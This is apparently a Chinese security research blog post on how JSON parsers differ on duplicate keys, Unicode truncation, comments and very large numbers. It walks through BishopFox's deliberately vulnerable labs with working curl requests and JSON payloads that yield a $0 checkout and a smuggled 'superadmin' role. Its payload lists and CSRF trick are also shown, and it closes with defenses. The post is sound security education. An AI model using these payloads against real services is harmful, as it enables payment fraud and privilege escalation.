JSON解析差异-风险研究

简介

​ 这篇文章中,分享一个技巧。通过json解析差异可能存在的安全风险

​ 需要的前提: 多组件JSON解析存在差异

从json开始

​ JSON(JavaScript Object Notation)是一种轻量级的数据交换格式,易于人类阅读和编写,同时也易于机器解析和生成。它广泛用于数据传输,尤其是在客户端与服务器之间的数据交换。

​ 源自JavaScript语言,但随着时间的推移,已发展成为众多编程语言支持的通用数据格式标准。

一个示例

{
  "name": "John Doe",
  "age": 30,
  "isEmployee": true,
  "address": {
    "street": "123 Main St",
    "city": "New York",
    "zipcode": "10001"
  },
  "phoneNumbers": ["123-456-7890", "987-654-3210"]
}

JSON解析安全问题

​ 在正式开始之前,先说两个结论

  • 相同的 JSON 文档可以跨微服务解析为不同的值,从而导致各种潜在的安全风险
  • 正是因为第一点,JSON解释器越多,那么潜在得安全问题越多

问题来源

​ 想必任何问题都是这样,无规矩不成方圆,正是因为没有对JSON格式化进行强定义的规范导致JSON解析差异引发安全问题

​ 官方 JSON RFC 中,也对一些细节提供了宽泛的规则,例如如何处理重复键和表示数字。尽管本指南后面有关于解析差异的免责声明,但大多数 JSON 解析器的用户并未关注这些注意事项

​ 并且除了官方的RFC规范,还有很多不同解析器的不同规范,列举如下

  • IETF JSON RFC (8259 and prior): official Internet Engineering Task Force (IETF) specification.
  • ECMAScript Standard: Changes to JSON are released in lockstep with RFC releases, and the standard refers to the RFC for guidance on JSON. However, non-spec conveniences provided by the JavaScript interpreter, such as quoteless strings and comments, have inspired many parsers.
  • JSON5: This superset specification augments the official specification by explicitly adding convenience features (e.g., comments, alternative quotes, quoteless strings, trailing commas).
  • HJSON: HJSON is similar to JSON5 in spirit with different design choices.
  • 等等...

重复键的处理(优先级问题)

obj = {"a": 1, "a": 2}

如上:a的值到底是1还是2?

来看下IETF JSON RFC (8259)的解释https://datatracker.ietf.org/doc/html/rfc8259

官方解释了这块:简单理解意思就是并无明确规定

问题复现:https://github.com/BishopFox/json-interop-vuln-labs/tree/master/lab1

这里我们采用这个实验进行问题分析

  • 启动容器
docker-compose up -d
  • python flask jsonschema 处理
import jsonschema
import requests
import json



test_json = {
    "orderId": 10,
        "cart": [
        {
            "id": 0,
            "qty": 5
        },
        {
            "id": 1,
            "qty": -1,
            "qty": 1
        }
    ]
}


test_json2 = {
    "orderId": 10,
        "cart": [
        {
            "id": 0,
            "qty": 5
        },
        {
            "id": -10,
            "qty": 1
        }
    ]
}

schema = {
    "type": "object",
    "properties": {
        "orderId": {
            "type": "number",
            "maximum": 10,
        },
        "cart": {
            "type": "array",
            "items": {
                "type": "object",
                "properties": {
                    "id": {
                        "type": "number",
                        "minimum": 0,
                        "exclusiveMaximum": 9 #len(productDB)-1
                    },
                    "qty": {
                        "type": "integer",
                        "minimum": 1
                    },
                },
                "required": ["id", "qty"],
            }
        }
    },
    "required": ["orderId", "cart"],
}


res = jsonschema.validate(instance=test_json, schema=schema)
print(res)
print(test_json)

res2 = jsonschema.validate(instance=test_json2, schema=schema)
print(res2)
print(test_json2)

  • 可见python处理的方式为,已重复的第二个键为主

  • golang的处理
package main

import (
    "fmt"
    "github.com/buger/jsonparser"
)

func main() {
    jsonData := []byte(`{
        "orderId": 10,
            "cart": [
            {
                "id": 0,
                "qty": 5
            },
            {
                "id": 1,
                "qty": -1,
                "qty": 1
            }
        ]
    }`)

    // fmt.Println("data:", jsonData)

    jsonparser.ArrayEach(
        jsonData,
        func(value []byte, dataType jsonparser.ValueType, offset int, err error) {
            id, _ := jsonparser.GetInt(value, "id")
            qty, _ := jsonparser.GetInt(value, "qty")
            fmt.Println("id:", id)
            fmt.Println("qty:", qty)
        },
    "cart")

}

  • 可见go jsonparser处理的方式为,已重复的第一个键为主

  • lab1的wp也就是利用的这一点,python的flask服务作为代理校验层,而真正的计算逻辑在go

curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_req.json
# lab1_req.json
{
    "orderId": 10,
        "cart": [
        {
            "id": 0,
            "qty": 5
        },
        {
            "id": 1,
            "qty": -1,
            "qty": 1
        }
    ]
}

  • 100*5-200 = 300

字符截断&注释(优先级问题)

​ 可以通过字符截断和注释引发解析冲突问题,从而增加受重复键优先级影响的解析器数量。

字符截断

​ 当特定字符出现在字符串中时,某些json解析lib会截断,而一些解析器则不会。可能会导致不同的键被解释为重复项

比如如下payload

{"test": 1, "test\[raw \x0d byte]": 2} 
{"test": 1, "test\ud800": 2}
{"test": 1, "test"": 2}
{"test": 1, "te\st": 2}
  • python2.X 对unicode编码解码行为
import json
import ujson
# Serialization into illegal unicode.
u"asdf\ud800".encode("utf-8")

# Reserializing illegal unicode
json.dumps({"test": "asdf\xed\xa0\x80"})

# 三方工具 ujson处理 重复key
ujson.loads('{"test": 1, "test\\ud800": 2}')

  • python3.X 对unicode编码解码行为

总结可见,python2 对此类情况存在绕过的可能

lab2 复现

https://github.com/BishopFox/json-interop-vuln-labs/tree/master/lab2

  • 创建admin用户/user/create,正常业务逻辑

{
    "user": "adminUser",
    "roles": ["superadmin"]
}
  • 创建普通角色成功

{"name": "simple"}
  • superadmin\ud888 unicode解析绕过

[root@localhost lab2]# cat role2.json 
{"name": "superadmin\ud888"}
  • 创建exampleuser 权限为 superadmin\ud888
[root@localhost lab2]# curl localhost:5002/user/create -H "Content-Type: application/json" -d @user2.json
{"OK":"Created user 'exampleUser'"}

[root@localhost lab2]# cat user2.json 
{
    "user": "exampleUser",
    "roles": ["superadmin\ud888"]
}
  • 验证

注释截断

​ 这块引用整理如下:

obj = {"description": "Duplicate with comments", "test": 2, "extra": /*, "test": 1, "extra2": */}

不同json sdk解析结果如下

  • GoLang's GoJay library
description = "Duplicate with comments"
test = 2
extra = ""
  • Java's JSON-iterator library
description = "Duplicate with comments"
extra = "/*"
extra2 = "*/"
test = 1
obj = {"description": "Comment support", "test": 1, "extra": "a"/*, "test": 2, "extra2": "b"*/}

不同json sdk解析结果如下

  • Java’s GSON library
{"description":"Comment support","test":1,"extra":"a"}
  • Ruby’s simdjson library
{"description":"Comment support","test":2,"extra":"a","extra2":"b"}

JSON序列化风险

​ json序列化过程同样需要注重重复键的问题,举例如下

# Java's JSON-iterator

# input
obj = {"test": 1, "test": 2}

# output
obj["test"] // 1
obj.toString() // {"test": 2}
# C++’s rapidjson

# input
obj = {"test": 1, "test": 2}

# output
obj["test"] // 2
obj.toString() // {"test": 1, "test": 2}

int float类型 json解析

首先看下官方的解释,RFC中明确提出这块解析会有潜在的不一致问题

大数问题

# input
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999

# 可能的output
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
9.999999999999999e95
1E+96
0
9223372036854775807

eg:

  • python3 demo
[root@localhost json-interop-vuln-labs_test]# python3 python_json.py 
/usr/local/lib/python3.8/site-packages/urllib3/__init__.py:35: NotOpenSSLWarning: urllib3 v2 only supports OpenSSL 1.1.1+, currently the 'ssl' module is compiled with 'LibreSSL 3.9.0'. See: https://github.com/urllib3/urllib3/issues/3020
  warnings.warn(
None
{'orderId': 10, 'cart': [{'id': 0, 'qty': 5}, {'id': 1, 'qty': 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}]}

python3对 大数处理正常

  • go demo
jsonData := []byte(`{
        "orderId": 10,
            "cart": [
            {
                "id": 0,
                "qty": 5
            },
            {
                "id": 1,
                "qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
            }
        ]
    }`)

GO 处理大数字 解析后为 0

  • lab1的第二种解法
[root@localhost lab1]# cat lab1_alt_req.json 
{
        "orderId": 10,
        "cart": [
        {
            "id": 8,
            "qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
        }
    ]
}
curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_alt_req.json

>>>
[root@localhost lab1]# curl 192.168.56.130:5000/cart/checkout -H "Content-Type: application/json" -d @lab1_alt_req.json
Receipt:
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999x $100 E-Gift Card @ $100/unit

Total Charged: $0
  • 最后一种特殊case,大数到无穷大

RFC定义:Positive and negative infinity along with NaN (not a number) are not supported by the official RFC

同样RFC并没有进行强制规定,那么可能的case如下

{"description":"Big float","test":1.0e4096}
{"description":"Big float","test":Infinity}
{"description":"Big float","test":"+Infinity"}
{"description":"Big float","test":null}
{"description":"Big float","test":Inf}
{"description":"Big float","test":3.0e14159265358979323846}
{"description":"Big float","test":9.218868437227405E+18}

# php demo
<b><?php</b>
echo 0 == 1.0e4096 ? "True": "False" . "\n"; # False
echo 0 == "Infinity" ? "True": "False" . "\n"; # True
<b>?></b>

宽松的JSON序列化

​ 总结来说,一些json解析器会严格执行RFC语法。同样其他的解析器允许出现一些"奇怪"字符

  • CSRF攻击中
POST /update_XXX HTTP/1.1
...
Content-Type: application/x-www-form-urlencoded

{"testlaitie233": 1}=

一些payload之所以能够执行也是因为这个原因

这部分可以进行fuzz测试

防御

这部分要分为json sdk开发 普通使用开发者两个维度

  • json sdk开发: 严格按照RFC定义规范,并处理本文介绍的异常case
  • 普通开发者(使用方):盘点整个架构中现有的解析器,对异常情况进行jsonscheme强校验

写在最后

​ 本文介绍了一种json解析导致的潜在安全问题,在真实的环境,需要多多分析各json解释器的差异和相同点

​ 历史上也有很多CVE的原理如此

参考

https://bishopfox.com/blog/json-interoperability-vulnerabilities

https://portswigger.net/daily-swig/research-how-json-parsers-can-create-security-risks-when-it-comes-to-interoperability

https://github.com/BishopFox/json-interop-vuln-labs/

点击收藏 | 0 关注 | 1 打赏
  • 动动手指,沙发就是你的了!
登录 后跟帖